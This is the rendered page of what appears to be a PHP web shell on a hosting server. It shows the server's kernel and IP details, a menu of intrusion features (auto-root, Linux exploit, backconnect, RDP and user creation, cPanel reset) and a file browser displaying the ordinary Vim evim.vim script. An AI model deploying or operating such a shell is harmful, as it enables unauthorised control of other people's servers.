Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 18.119.108.233
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
vim /
vim74 /
[ HOME SHELL ]
Name
Size
Permission
Action
autoload
[ DIR ]
drwxr-xr-x
colors
[ DIR ]
drwxr-xr-x
compiler
[ DIR ]
drwxr-xr-x
doc
[ DIR ]
drwxr-xr-x
ftplugin
[ DIR ]
drwxr-xr-x
indent
[ DIR ]
drwxr-xr-x
keymap
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
macros
[ DIR ]
drwxr-xr-x
plugin
[ DIR ]
drwxr-xr-x
print
[ DIR ]
drwxr-xr-x
spell
[ DIR ]
drwxr-xr-x
syntax
[ DIR ]
drwxr-xr-x
tutor
[ DIR ]
drwxr-xr-x
bugreport.vim
1.91
KB
-rw-r--r--
delmenu.vim
645
B
-rw-r--r--
evim.vim
1.92
KB
-rw-r--r--
filetype.vim
66.82
KB
-rw-r--r--
ftoff.vim
280
B
-rw-r--r--
ftplugin.vim
971
B
-rw-r--r--
ftplugof.vim
337
B
-rw-r--r--
gvimrc_example.vim
1.66
KB
-rw-r--r--
indent.vim
767
B
-rw-r--r--
indoff.vim
282
B
-rw-r--r--
menu.vim
37.59
KB
-rw-r--r--
mswin.vim
2.59
KB
-rw-r--r--
optwin.vim
54.4
KB
-rw-r--r--
scripts.vim
10.15
KB
-rw-r--r--
synmenu.vim
35.95
KB
-rw-r--r--
vimrc_example.vim
3.2
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : evim.vim
" Vim script for Evim key bindings " Maintainer: Bram Moolenaar <Bram@vim.org> " Last Change: 2006 Mar 29 " Don't use Vi-compatible mode. set nocompatible " Use the mswin.vim script for most mappings source <sfile>:p:h/mswin.vim " Vim is in Insert mode by default set insertmode " Make a buffer hidden when editing another one set hidden " Make cursor keys ignore wrapping inoremap <silent> <Down> <C-R>=pumvisible() ? "\<lt>Down>" : "\<lt>C-O>gj"<CR> inoremap <silent> <Up> <C-R>=pumvisible() ? "\<lt>Up>" : "\<lt>C-O>gk"<CR> " CTRL-F does Find dialog instead of page forward noremap <silent> <C-F> :promptfind<CR> vnoremap <silent> <C-F> y:promptfind <C-R>"<CR> onoremap <silent> <C-F> <C-C>:promptfind<CR> inoremap <silent> <C-F> <C-O>:promptfind<CR> cnoremap <silent> <C-F> <C-C>:promptfind<CR> set backspace=2 " allow backspacing over everything in insert mode set autoindent " always set autoindenting on if has("vms") set nobackup " do not keep a backup file, use versions instead else set backup " keep a backup file endif set history=50 " keep 50 lines of command line history set ruler " show the cursor position all the time set incsearch " do incremental searching set mouse=a " always use the mouse " Don't use Ex mode, use Q for formatting map Q gq " Switch syntax highlighting on, when the terminal has colors " Highlight the last used search pattern on the next search command. if &t_Co > 2 || has("gui_running") syntax on set hlsearch nohlsearch endif " Only do this part when compiled with support for autocommands. if has("autocmd") " Enable file type detection. " Use the default filetype settings, so that mail gets 'tw' set to 72, " 'cindent' is on in C files, etc. " Also load indent files, to automatically do language-dependent indenting. filetype plugin indent on " For all text files set 'textwidth' to 78 characters. au FileType text setlocal tw=78 endif " has("autocmd") " vim: set sw=2 :
Close